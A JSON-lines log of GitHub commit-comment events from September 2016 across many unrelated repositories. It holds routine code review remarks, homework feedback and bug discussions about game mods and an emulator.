{"id":"4525073973","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18922204,"position":369,"line":269,"path":"src/gui/dialogs/preferences_dialog.cpp","commit_id":"717aa892d2e52e670f6deda6182f5f4f688eac99","created_at":"2016-09-07T02:31:44Z","updated_at":"2016-09-07T02:31:44Z","body":"I think it makes more sense for these two to capture `[this]` instead of `[&]`."}},"created_at":"2016-09-07T02:31:44Z"}
{"id":"4525076150","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18922210,"position":74,"line":102,"path":"src/gui/dialogs/preferences_dialog.cpp","commit_id":"717aa892d2e52e670f6deda6182f5f4f688eac99","created_at":"2016-09-07T02:32:33Z","updated_at":"2016-09-07T02:32:33Z","body":"Why is this a member variable now?"}},"created_at":"2016-09-07T02:32:33Z"}
{"id":"4525079790","type":"CommitCommentEvent","actor":{"login":"RIAEvangelist"},"repo":{"name":"pdube/node-dominos-pizza-api"},"payload":{"comment":{"id":18922218,"position":null,"line":null,"path":null,"commit_id":"7f49bae9224eacdc1a1cbb19c873a03ab777f9c9","created_at":"2016-09-07T02:33:59Z","updated_at":"2016-09-07T02:33:59Z","body":"Hey guys, could you put the URLs in a config, so the user can choose which they want? That way we can integrate our work together for everybody."}},"created_at":"2016-09-07T02:33:59Z"}
{"id":"4525079839","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18922219,"position":347,"line":262,"path":"src/gui/dialogs/preferences_dialog.cpp","commit_id":"717aa892d2e52e670f6deda6182f5f4f688eac99","created_at":"2016-09-07T02:34:00Z","updated_at":"2016-09-07T02:34:00Z","body":"I don't like the `->void`. It's implied, anyway."}},"created_at":"2016-09-07T02:34:00Z"}
{"id":"4525082185","type":"CommitCommentEvent","actor":{"login":"INSPIRE-REX"},"repo":{"name":"COND-ORG/android_device_motorola_condor"},"payload":{"comment":{"id":18922222,"position":null,"line":null,"path":null,"commit_id":"b9c024a376be846b09257a1277eef6277ccf0864","created_at":"2016-09-07T02:34:52Z","updated_at":"2016-09-07T02:34:52Z","body":"Commiting commits By Others?"}},"created_at":"2016-09-07T02:34:52Z"}
{"id":"4525082186","type":"CommitCommentEvent","actor":{"login":"Dreameeer"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922223,"position":null,"line":null,"path":null,"commit_id":"b107355484d4bd79e25f274880e4e1b49290ba9a","created_at":"2016-09-07T02:34:52Z","updated_at":"2016-09-07T02:34:52Z","body":"StudetManager.java has missing comments. All the other codes have got necessary comments however there are slight indentation problem in some files. Make sure indent properly\r\n"}},"created_at":"2016-09-07T02:34:52Z"}
{"id":"4525083363","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"SpencerLJack/Final-Project---Spencer-Jack"},"payload":{"comment":{"id":18922224,"position":null,"line":null,"path":null,"commit_id":"7d7619af29d07058580552f1fcd4073a2b7da2ec","created_at":"2016-09-07T02:35:18Z","updated_at":"2016-09-07T02:35:18Z","body":"This is an excellent start. Your JS sounds challenging without being overly ambitious. Feel free to use libraries to implement as much of this functionality as you see fit. You may be interested in libraries that implement \"lightbox\" style slideshows and stellar.js"}},"created_at":"2016-09-07T02:35:18Z"}
{"id":"4525084520","type":"CommitCommentEvent","actor":{"login":"qiangqiang93"},"repo":{"name":"qiangqiang93/taobao-animation"},"payload":{"comment":{"id":18922225,"position":null,"line":null,"path":null,"commit_id":"227b99da489e3eaa06b13afcf598e677f8dcfdf3","created_at":"2016-09-07T02:35:45Z","updated_at":"2016-09-07T02:35:45Z","body":"just a practice"}},"created_at":"2016-09-07T02:35:45Z"}
{"id":"4525085873","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922229,"position":null,"line":null,"path":null,"commit_id":"b107355484d4bd79e25f274880e4e1b49290ba9a","created_at":"2016-09-07T02:36:14Z","updated_at":"2016-09-07T02:36:14Z","body":"Thanks for letting me know @Dreameeer . I will make changes accordingly and go thorugh the codes one more time."}},"created_at":"2016-09-07T02:36:14Z"}
{"id":"4525086278","type":"CommitCommentEvent","actor":{"login":"paulproteus"},"repo":{"name":"ocdtrekkie/draw"},"payload":{"comment":{"id":18922230,"position":597,"line":865,"path":"sandstorm-files.list","commit_id":"c9cca6d2ec8e2f026cf8cfceaf6289b09f03ed0b","created_at":"2016-09-07T02:36:22Z","updated_at":"2016-09-07T02:36:22Z","body":"I think so but I'm honestly not sure."}},"created_at":"2016-09-07T02:36:22Z"}
{"id":"4525088709","type":"CommitCommentEvent","actor":{"login":"Dreameeer"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922235,"position":null,"line":null,"path":null,"commit_id":"b107355484d4bd79e25f274880e4e1b49290ba9a","created_at":"2016-09-07T02:37:14Z","updated_at":"2016-09-07T02:37:14Z","body":"Also, you need to add comment on loops and variables inside the methods.make sure you add comment on them as well. "}},"created_at":"2016-09-07T02:37:14Z"}
{"id":"4525090125","type":"CommitCommentEvent","actor":{"login":"yinhualei"},"repo":{"name":"yinhualei/git-repository"},"payload":{"comment":{"id":18922244,"position":null,"line":null,"path":null,"commit_id":"f35ea3f0559528ce8619034014a2654c6ff0ec9c","created_at":"2016-09-07T02:37:45Z","updated_at":"2016-09-07T02:37:45Z","body":"22222222222222222"}},"created_at":"2016-09-07T02:37:45Z"}
{"id":"4525090160","type":"CommitCommentEvent","actor":{"login":"lukemiles"},"repo":{"name":"pennyapp/cordova-plugin-detect-screenshot"},"payload":{"comment":{"id":18922245,"position":null,"line":null,"path":null,"commit_id":"6ec95b6586737adfa0d80f6c69936ac4b5eb9e6f","created_at":"2016-09-07T02:37:47Z","updated_at":"2016-09-07T02:37:47Z","body":"hey, just seeing this. mind sending a PR to the original repo? "}},"created_at":"2016-09-07T02:37:47Z"}
{"id":"4525091686","type":"CommitCommentEvent","actor":{"login":"jwandrews"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18922247,"position":null,"line":null,"path":null,"commit_id":"5a2ac56dbe58a656691873ef89c6f8e3692e0bdf","created_at":"2016-09-07T02:38:18Z","updated_at":"2016-09-07T02:38:18Z","body":"Well thank you for keeping me honest :) it's always better to have someone challenge your decisions than to go around shipping code all willy-nilly. "}},"created_at":"2016-09-07T02:38:18Z"}
{"id":"4525092388","type":"CommitCommentEvent","actor":{"login":"araiyoshiko"},"repo":{"name":"araiyoshiko/firstTest"},"payload":{"comment":{"id":18922254,"position":null,"line":null,"path":null,"commit_id":"b58e3a87b240aa8b8d0d081b2c5b5a30bda1a00e","created_at":"2016-09-07T02:38:35Z","updated_at":"2016-09-07T02:38:35Z","body":"ああああああ"}},"created_at":"2016-09-07T02:38:35Z"}
{"id":"4525093108","type":"CommitCommentEvent","actor":{"login":"araiyoshiko"},"repo":{"name":"araiyoshiko/firstTest"},"payload":{"comment":{"id":18922255,"position":4,"line":16,"path":"index.html","commit_id":"b58e3a87b240aa8b8d0d081b2c5b5a30bda1a00e","created_at":"2016-09-07T02:38:51Z","updated_at":"2016-09-07T02:38:51Z","body":"あああああ"}},"created_at":"2016-09-07T02:38:51Z"}
{"id":"4525095935","type":"CommitCommentEvent","actor":{"login":"A-t48"},"repo":{"name":"PKPenguin321/-tg-station"},"payload":{"comment":{"id":18922264,"position":null,"line":null,"path":null,"commit_id":"4cc2d62e4f9eb02890b80514688ca3a3c284a289","created_at":"2016-09-07T02:39:57Z","updated_at":"2016-09-07T02:39:57Z","body":"+Goofy McBall"}},"created_at":"2016-09-07T02:39:57Z"}
{"id":"4525096333","type":"CommitCommentEvent","actor":{"login":"jwandrews"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18922265,"position":null,"line":null,"path":null,"commit_id":"5a2ac56dbe58a656691873ef89c6f8e3692e0bdf","created_at":"2016-09-07T02:40:06Z","updated_at":"2016-09-07T02:40:06Z","body":"Branching allows for better integration testing too as I can require that branch as a dependency in projects and test the new code before committing to the release and having to do major backtracks if there was a bug."}},"created_at":"2016-09-07T02:40:06Z"}
{"id":"4525096853","type":"CommitCommentEvent","actor":{"login":"AFADoomer"},"repo":{"name":"Realm667/WolfenDoom"},"payload":{"comment":{"id":18922266,"position":null,"line":null,"path":null,"commit_id":"a7be9b0b1312dcf09f0399f29d9ec1ce96051845","created_at":"2016-09-07T02:40:16Z","updated_at":"2016-09-07T02:40:16Z","body":"That...  Doesn't make sense.  Because your A_CheckRange call was in the\nexact same looped state, just a 0-length frame instead of 1 tic...\n\nI'll play around with it some more...  If I can't get anything to work,\nI'll just revert to your commit...\n\nI don't have cl_capfps set...  I still only get ~20-25 FPS max in chunks of\nthis level - probably more if I lower the resolution, but then it doesn't\nlook as good :-)\n\nOn Tue, Sep 6, 2016 at 9:29 PM, Ozymandias81 <notifications@github.com>\nwrote:\n\n> Uhm... Nope, I think you must work with CheckRange tweaks because the\n> CountProximity is called 1tic in a looped state, so I get the same amount\n> of lags 😭\n> [image: screenshot_doom_20160907_042321]\n> <https://cloud.githubusercontent.com/assets/11136108/18297728/3445373a-74b3-11e6-8044-0dc722eacc32.png>\n> ...so the dummy state is needed imho, this way you may also keep the\n> gldefs as it was before because you'll get back with the 25 thing.\n>\n> BTW have you set on your config cl_capfps to true? Maybe you don't get\n> framerate changes even for this reason too.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Realm667/WolfenDoom/commit/a7be9b0b1312dcf09f0399f29d9ec1ce96051845#commitcomment-18922195>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AP2VREqHhUzhVGBfRw3vNMEPRZZFdzIxks5qniGWgaJpZM4J2eWj>\n> .\n>\n"}},"created_at":"2016-09-07T02:40:16Z"}
{"id":"4525098769","type":"CommitCommentEvent","actor":{"login":"mattdrose"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18922267,"position":null,"line":null,"path":null,"commit_id":"5a2ac56dbe58a656691873ef89c6f8e3692e0bdf","created_at":"2016-09-07T02:40:57Z","updated_at":"2016-09-07T02:40:57Z","body":"👍 "}},"created_at":"2016-09-07T02:40:57Z"}
{"id":"4525098779","type":"CommitCommentEvent","actor":{"login":"jwandrews"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18922268,"position":null,"line":null,"path":null,"commit_id":"5a2ac56dbe58a656691873ef89c6f8e3692e0bdf","created_at":"2016-09-07T02:40:57Z","updated_at":"2016-09-07T02:40:57Z","body":"But of course I'm preaching to the choir so to speak ;)"}},"created_at":"2016-09-07T02:40:57Z"}
{"id":"4525100213","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"hunterdt/homework_7"},"payload":{"comment":{"id":18922272,"position":14,"line":14,"path":"blog.html","commit_id":"1399243dccb02bdc4cc2c9b2d2a46d1b01be2d73","created_at":"2016-09-07T02:41:29Z","updated_at":"2016-09-07T02:41:29Z","body":"This is an impressive way to implement these styles. You may be interested in the html5 picture element, which implements responsive images in a similar fashion. "}},"created_at":"2016-09-07T02:41:29Z"}
{"id":"4525102443","type":"CommitCommentEvent","actor":{"login":"tjlytle"},"repo":{"name":"Nexmo/nexmo-node"},"payload":{"comment":{"id":18922282,"position":7,"line":47,"path":"package.json","commit_id":"15ea4953a7fac2dfd57a0b48f72fa54e1354679a","created_at":"2016-09-07T02:42:17Z","updated_at":"2016-09-07T02:42:17Z","body":"My current plan for the PHP library is to use a dependency (it, for the record, already has dependencies), then remove it later. My (not fully complete) understanding is that it shouldn't be too difficult as we'd only need to support the JWT encoding Nexmo uses (as opposed to the variety of key types / encryption algorithms a standard library needs to maintain)."}},"created_at":"2016-09-07T02:42:17Z"}
{"id":"4525104152","type":"CommitCommentEvent","actor":{"login":"Blackop778"},"repo":{"name":"jriwanek/Chisel-3"},"payload":{"comment":{"id":18922286,"position":null,"line":null,"path":null,"commit_id":"30e3f590a1c87564679b1fe63b61bd80e98ded24","created_at":"2016-09-07T02:42:53Z","updated_at":"2016-09-07T02:42:53Z","body":"Couldn't you have simply pressed the Watch button?"}},"created_at":"2016-09-07T02:42:53Z"}
{"id":"4525109083","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"hunterdt/homework_7"},"payload":{"comment":{"id":18922292,"position":null,"line":null,"path":null,"commit_id":"1399243dccb02bdc4cc2c9b2d2a46d1b01be2d73","created_at":"2016-09-07T02:44:26Z","updated_at":"2016-09-07T02:44:26Z","body":"Excellent work. Be sure to be mindful about the order that you load your responsive layout css files in. In this case it makes the most sense to go from narrowest to widest so that the layout is truly mobile first. "}},"created_at":"2016-09-07T02:44:26Z"}
{"id":"4525109212","type":"CommitCommentEvent","actor":{"login":"jangorecki"},"repo":{"name":"MichaelChirico/data.table"},"payload":{"comment":{"id":18922293,"position":4,"line":2482,"path":"R/data.table.R","commit_id":"f4922c095aab5778faf24ed2d0a5e6c34cbee7d3","created_at":"2016-09-07T02:44:30Z","updated_at":"2016-09-07T02:44:30Z","body":"this is breaking change for some of my scripts where I use `neworder` arg name, if functionality didn't change then better to keep same arg name @MichaelChirico I forget I had your branch installed, and went into issues in my other pkg check"}},"created_at":"2016-09-07T02:44:30Z"}
{"id":"4525111308","type":"CommitCommentEvent","actor":{"login":"dengmao641"},"repo":{"name":"dengmao641/liuyue"},"payload":{"comment":{"id":18922294,"position":560,"line":560,"path":"17173/css/js/ckplayer.js","commit_id":"ed9980acc0e47b8377f026ec5c21ab1038efb795","created_at":"2016-09-07T02:45:17Z","updated_at":"2016-09-07T02:45:17Z","body":"你发的减分"}},"created_at":"2016-09-07T02:45:17Z"}
{"id":"4525111635","type":"CommitCommentEvent","actor":{"login":"jriwanek"},"repo":{"name":"jriwanek/Chisel-3"},"payload":{"comment":{"id":18922296,"position":null,"line":null,"path":null,"commit_id":"30e3f590a1c87564679b1fe63b61bd80e98ded24","created_at":"2016-09-07T02:45:24Z","updated_at":"2016-09-07T02:45:24Z","body":"Yes, I could have . If you read the addition to the readme, you'd see why I made a copy.\r\nClosing and locking to avoid further meaningless commentary."}},"created_at":"2016-09-07T02:45:24Z"}
{"id":"4525116065","type":"CommitCommentEvent","actor":{"login":"Explorare"},"repo":{"name":"acgotaku/BaiduExporter"},"payload":{"comment":{"id":18922308,"position":null,"line":null,"path":null,"commit_id":"fc07653393774883408eb1eaceb2cabe99c9ca00","created_at":"2016-09-07T02:47:02Z","updated_at":"2016-09-07T02:47:02Z","body":"辛苦了 "}},"created_at":"2016-09-07T02:47:02Z"}
{"id":"4525120912","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"wyatt-nelson/Homework_7"},"payload":{"comment":{"id":18922315,"position":44,"line":14,"path":"blog.html","commit_id":"348010275689ea49fac7dc8760a252004a699b9b","created_at":"2016-09-07T02:48:52Z","updated_at":"2016-09-07T02:48:52Z","body":"this is an interesting way to implement the media query. You may be interested in the html5 picture element which will work in a similar fashion. "}},"created_at":"2016-09-07T02:48:52Z"}
{"id":"4525123541","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922318,"position":null,"line":null,"path":null,"commit_id":"b107355484d4bd79e25f274880e4e1b49290ba9a","created_at":"2016-09-07T02:49:54Z","updated_at":"2016-09-07T02:49:54Z","body":"Thankyou. I have done as you said. Please have a look at it and let me know if further changes need to be made."}},"created_at":"2016-09-07T02:49:54Z"}
{"id":"4525124019","type":"CommitCommentEvent","actor":{"login":"alternatebow"},"repo":{"name":"CS111C-META-FALL-2016/LabB-Team1"},"payload":{"comment":{"id":18922319,"position":74,"line":68,"path":"src/StackOfBooks.java","commit_id":"16c5eeadeac2542200334c4caf09d78aae193c2e","created_at":"2016-09-07T02:50:07Z","updated_at":"2016-09-07T02:50:07Z","body":"Do we really want to return a value if we are adding an entry to the top of the stack? Doesn't the 'peek' method do that for us?"}},"created_at":"2016-09-07T02:50:07Z"}
{"id":"4525125483","type":"CommitCommentEvent","actor":{"login":"Luxi-Zhao"},"repo":{"name":"Luxi-Zhao/Android-Calculator"},"payload":{"comment":{"id":18922325,"position":16,"line":14,"path":"README.md","commit_id":"b3735e5c02f08b53006390dc775553e0e5b7addf","created_at":"2016-09-07T02:50:38Z","updated_at":"2016-09-07T02:50:38Z","body":"*this calculator accepts only two operands in each calculation, except for the % operator, which only works on one operand\r\n*the result will only be shown on the screen after \"=\" is clicked"}},"created_at":"2016-09-07T02:50:38Z"}
{"id":"4525125689","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"wyatt-nelson/Homework_7"},"payload":{"comment":{"id":18922326,"position":125,"line":109,"path":"css/style.css","commit_id":"348010275689ea49fac7dc8760a252004a699b9b","created_at":"2016-09-07T02:50:42Z","updated_at":"2016-09-07T02:50:42Z","body":"Very nice. If you eventually use a CSS preprocessor like SASS or LESS you can make this calculation once and store it in a variable. "}},"created_at":"2016-09-07T02:50:42Z"}
{"id":"4525125837","type":"CommitCommentEvent","actor":{"login":"Dreameeer"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922327,"position":null,"line":null,"path":null,"commit_id":"cac23d8e13d7111da43172179dbb41bc95a43207","created_at":"2016-09-07T02:50:45Z","updated_at":"2016-09-07T02:50:45Z","body":"Good work!! Cheers mate @Neptron101 "}},"created_at":"2016-09-07T02:50:45Z"}
{"id":"4525127795","type":"CommitCommentEvent","actor":{"login":"fsbmat"},"repo":{"name":"fsbmat/fsbmat.github.io"},"payload":{"comment":{"id":18922331,"position":4,"line":21,"path":"_site/index.html","commit_id":"9110b786b7b4e09cff1c9aba03e78fe9b2a98fbb","created_at":"2016-09-07T02:51:30Z","updated_at":"2016-09-07T02:51:30Z","body":"Não funcionou!"}},"created_at":"2016-09-07T02:51:30Z"}
{"id":"4525127915","type":"CommitCommentEvent","actor":{"login":"rascoro1"},"repo":{"name":"rascoro1/SnipMyVideo"},"payload":{"comment":{"id":18922332,"position":null,"line":null,"path":null,"commit_id":"dd475d8c8057733533a75e2f5ee2a432f313bb1b","created_at":"2016-09-07T02:51:33Z","updated_at":"2016-09-07T02:51:33Z","body":"Basically ended up scrapping the script and rewriting for a prettier and easier to read main."}},"created_at":"2016-09-07T02:51:33Z"}
{"id":"4525128461","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"wyatt-nelson/Homework_7"},"payload":{"comment":{"id":18922333,"position":null,"line":null,"path":null,"commit_id":"348010275689ea49fac7dc8760a252004a699b9b","created_at":"2016-09-07T02:51:45Z","updated_at":"2016-09-07T02:51:45Z","body":"Excellent work. Remember that it sometimes makes sense to eliminate content from the layout when we're viewing a layout on a small screen."}},"created_at":"2016-09-07T02:51:45Z"}
{"id":"4525129372","type":"CommitCommentEvent","actor":{"login":"AFADoomer"},"repo":{"name":"Realm667/WolfenDoom"},"payload":{"comment":{"id":18922335,"position":null,"line":null,"path":null,"commit_id":"a7be9b0b1312dcf09f0399f29d9ec1ce96051845","created_at":"2016-09-07T02:52:07Z","updated_at":"2016-09-07T02:52:07Z","body":"OK, committed another tweak...  If this doesn't make a difference for you\n(or at least perform similarly to your original commit), I give up...  I\nsee ~3FPS better with this change than with the previous attempt...\nHopefully that translates to more on your side.\n\nI think the CountProximity call must be much more expensive than\nA_CheckRange (which makes sense - I just didn't think it was *that*\ndifferent).\n\nOn Tue, Sep 6, 2016 at 9:40 PM, Jay Little <tjlittle123@gmail.com> wrote:\n\n> That...  Doesn't make sense.  Because your A_CheckRange call was in the\n> exact same looped state, just a 0-length frame instead of 1 tic...\n>\n> I'll play around with it some more...  If I can't get anything to work,\n> I'll just revert to your commit...\n>\n> I don't have cl_capfps set...  I still only get ~20-25 FPS max in chunks\n> of this level - probably more if I lower the resolution, but then it\n> doesn't look as good :-)\n>\n> On Tue, Sep 6, 2016 at 9:29 PM, Ozymandias81 <notifications@github.com>\n> wrote:\n>\n>> Uhm... Nope, I think you must work with CheckRange tweaks because the\n>> CountProximity is called 1tic in a looped state, so I get the same amount\n>> of lags 😭\n>> [image: screenshot_doom_20160907_042321]\n>> <https://cloud.githubusercontent.com/assets/11136108/18297728/3445373a-74b3-11e6-8044-0dc722eacc32.png>\n>> ...so the dummy state is needed imho, this way you may also keep the\n>> gldefs as it was before because you'll get back with the 25 thing.\n>>\n>> BTW have you set on your config cl_capfps to true? Maybe you don't get\n>> framerate changes even for this reason too.\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/Realm667/WolfenDoom/commit/a7be9b0b1312dcf09f0399f29d9ec1ce96051845#commitcomment-18922195>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AP2VREqHhUzhVGBfRw3vNMEPRZZFdzIxks5qniGWgaJpZM4J2eWj>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-07T02:52:07Z"}
{"id":"4525130178","type":"CommitCommentEvent","actor":{"login":"bjfish"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18922336,"position":5,"line":0,"path":"truffle/src/main/java/org/jruby/truffle/core/kernel/KernelNodes.java","commit_id":"22710129cea4d5d2ccf126a64661fbcc351e00f4","created_at":"2016-09-07T02:52:27Z","updated_at":"2016-09-07T02:52:27Z","body":"@eregon I've fixed this at 640732ce6621bce74dee0fbb9576626e6cf862b2, thanks"}},"created_at":"2016-09-07T02:52:27Z"}
{"id":"4525132620","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"wyatt-nelson/Final_Project"},"payload":{"comment":{"id":18922340,"position":null,"line":null,"path":null,"commit_id":"5db5dc8da8bd7a21c1b3cf934a8f56ad8e04a0c5","created_at":"2016-09-07T02:53:26Z","updated_at":"2016-09-07T02:53:26Z","body":"This is a very organized start. You'll want to research setInterval, clearInterval and a way to format a timestamp into hours, minutes and seconds. Let me know if you have any questions. "}},"created_at":"2016-09-07T02:53:26Z"}
{"id":"4525133461","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922341,"position":24,"line":9,"path":"Student.java","commit_id":"b107355484d4bd79e25f274880e4e1b49290ba9a","created_at":"2016-09-07T02:53:44Z","updated_at":"2016-09-07T02:53:44Z","body":"I have fixed the intendation. It might not be showing in the github site.  @Dreameeer "}},"created_at":"2016-09-07T02:53:44Z"}
{"id":"4525135001","type":"CommitCommentEvent","actor":{"login":"tausifj15"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":18922343,"position":null,"line":null,"path":null,"commit_id":"ad0167c9c1eb2af3492b4601d08903e536d6b4b2","created_at":"2016-09-07T02:54:18Z","updated_at":"2016-09-07T02:54:18Z","body":"So where can i ask\n\nOn Sep 6, 2016 7:28 PM, \"Henrik Rydgård\" <notifications@github.com> wrote:\n\n> @tausifj15 <https://github.com/tausifj15> god of war is fine if you run\n> in buffered rendering mode. in non-buffered it's not fixable. Also, this is\n> the wrong place to ask for that.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hrydgard/ppsspp/commit/ad0167c9c1eb2af3492b4601d08903e536d6b4b2#commitcomment-18911373>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATbKhpEQAybbM2-KEGMFNFJisXchmU3Jks5qnXFpgaJpZM4J11lG>\n> .\n>\n"}},"created_at":"2016-09-07T02:54:18Z"}
{"id":"4525135903","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922344,"position":null,"line":null,"path":null,"commit_id":"cac23d8e13d7111da43172179dbb41bc95a43207","created_at":"2016-09-07T02:54:39Z","updated_at":"2016-09-07T02:54:39Z","body":"Thanks."}},"created_at":"2016-09-07T02:54:39Z"}
{"id":"4525136099","type":"CommitCommentEvent","actor":{"login":"tausifj15"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":18922345,"position":null,"line":null,"path":null,"commit_id":"ad0167c9c1eb2af3492b4601d08903e536d6b4b2","created_at":"2016-09-07T02:54:43Z","updated_at":"2016-09-07T02:54:43Z","body":"In version 1.2.1 the darkness is fixed sir\n\nOn Sep 7, 2016 8:24 AM, wrote:\n\n> So where can i ask\n>\n> On Sep 6, 2016 7:28 PM, \"Henrik Rydgård\" <notifications@github.com> wrote:\n>\n>> @tausifj15 <https://github.com/tausifj15> god of war is fine if you run\n>> in buffered rendering mode. in non-buffered it's not fixable. Also, this is\n>> the wrong place to ask for that.\n>>\n>> —\n>> You are receiving this because you were mentioned.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/hrydgard/ppsspp/commit/ad0167c9c1eb2af3492b4601d08903e536d6b4b2#commitcomment-18911373>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ATbKhpEQAybbM2-KEGMFNFJisXchmU3Jks5qnXFpgaJpZM4J11lG>\n>> .\n>>\n>\n"}},"created_at":"2016-09-07T02:54:43Z"}
{"id":"4525137706","type":"CommitCommentEvent","actor":{"login":"tausifj15"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":18922350,"position":null,"line":null,"path":null,"commit_id":"ad0167c9c1eb2af3492b4601d08903e536d6b4b2","created_at":"2016-09-07T02:55:19Z","updated_at":"2016-09-07T02:55:19Z","body":"But in 1.2.2 its not i also send u pictures before\n\nOn Sep 7, 2016 8:24 AM, wrote:\n\n> In version 1.2.1 the darkness is fixed sir\n>\n> On Sep 7, 2016 8:24 AM, wrote:\n>\n>> So where can i ask\n>>\n>> On Sep 6, 2016 7:28 PM, \"Henrik Rydgård\" <notifications@github.com>\n>> wrote:\n>>\n>>> @tausifj15 <https://github.com/tausifj15> god of war is fine if you run\n>>> in buffered rendering mode. in non-buffered it's not fixable. Also, this is\n>>> the wrong place to ask for that.\n>>>\n>>> —\n>>> You are receiving this because you were mentioned.\n>>> Reply to this email directly, view it on GitHub\n>>> <https://github.com/hrydgard/ppsspp/commit/ad0167c9c1eb2af3492b4601d08903e536d6b4b2#commitcomment-18911373>,\n>>> or mute the thread\n>>> <https://github.com/notifications/unsubscribe-auth/ATbKhpEQAybbM2-KEGMFNFJisXchmU3Jks5qnXFpgaJpZM4J11lG>\n>>> .\n>>>\n>>\n"}},"created_at":"2016-09-07T02:55:19Z"}
{"id":"4525138031","type":"CommitCommentEvent","actor":{"login":"neurodeep"},"repo":{"name":"StevenBlack/hosts"},"payload":{"comment":{"id":18922351,"position":null,"line":null,"path":null,"commit_id":"91756b3889c581d76fddf760a51b07c762729edc","created_at":"2016-09-07T02:55:27Z","updated_at":"2016-09-07T02:55:27Z","body":"Python can't be installed in Program Files without admin privileges (at least on Windows 10). Default location is actually in Users, so the check for the dll failed for me.\r\n\r\nIn addition just running `updateHostsFile.py -a` just opens it in editor (I guess because extension is associated with it). Explicitly calling `py updateHostsFile.py -a` helpd with it."}},"created_at":"2016-09-07T02:55:27Z"}
{"id":"4525140879","type":"CommitCommentEvent","actor":{"login":"TPS"},"repo":{"name":"svn2github/nikkhokkho"},"payload":{"comment":{"id":18922360,"position":null,"line":null,"path":null,"commit_id":"bb2ce2039047fd5a0a4ea51b7d0c31b335e0efac","created_at":"2016-09-07T02:56:38Z","updated_at":"2016-09-07T02:56:38Z","body":"https://github.com/javiergutierrezchamorro/nikkhokkho/issues/14 is where this is requested."}},"created_at":"2016-09-07T02:56:38Z"}
{"id":"4525141426","type":"CommitCommentEvent","actor":{"login":"EMMANUEL15"},"repo":{"name":"EMMANUEL15/EMMANUEL"},"payload":{"comment":{"id":18922364,"position":9,"line":9,"path":"src/ee_t01_arrays/tarrea.java","commit_id":"1e11b9a71f2e0baeaffcc94c484f8e8fe7c17175","created_at":"2016-09-07T02:56:51Z","updated_at":"2016-09-07T02:56:51Z","body":"///"}},"created_at":"2016-09-07T02:56:51Z"}
{"id":"4525146144","type":"CommitCommentEvent","actor":{"login":"sabliran"},"repo":{"name":"sabliran/sabliran"},"payload":{"comment":{"id":18922379,"position":null,"line":null,"path":null,"commit_id":"244d6e2eb266d51207d07d19e418093272da911d","created_at":"2016-09-07T02:58:44Z","updated_at":"2016-09-07T02:58:44Z","body":"do you think they will?"}},"created_at":"2016-09-07T02:58:44Z"}
{"id":"4525146310","type":"CommitCommentEvent","actor":{"login":"BobLiu20"},"repo":{"name":"theupdateframework/tuf"},"payload":{"comment":{"id":18922381,"position":41,"line":116,"path":"tuf/scripts/tuf.py","commit_id":"f9e22f0b367665e69443f55e5619cec20f28b5ba","created_at":"2016-09-07T02:58:48Z","updated_at":"2016-09-07T02:58:48Z","body":"why we don't have except in this try ? error for my python 2.7. @vladimir-v-diaz "}},"created_at":"2016-09-07T02:58:48Z"}
{"id":"4525147146","type":"CommitCommentEvent","actor":{"login":"sabliran"},"repo":{"name":"sabliran/sabliran"},"payload":{"comment":{"id":18922384,"position":null,"line":null,"path":null,"commit_id":"244d6e2eb266d51207d07d19e418093272da911d","created_at":"2016-09-07T02:59:09Z","updated_at":"2016-09-07T02:59:09Z","body":"nah\r\n"}},"created_at":"2016-09-07T02:59:09Z"}
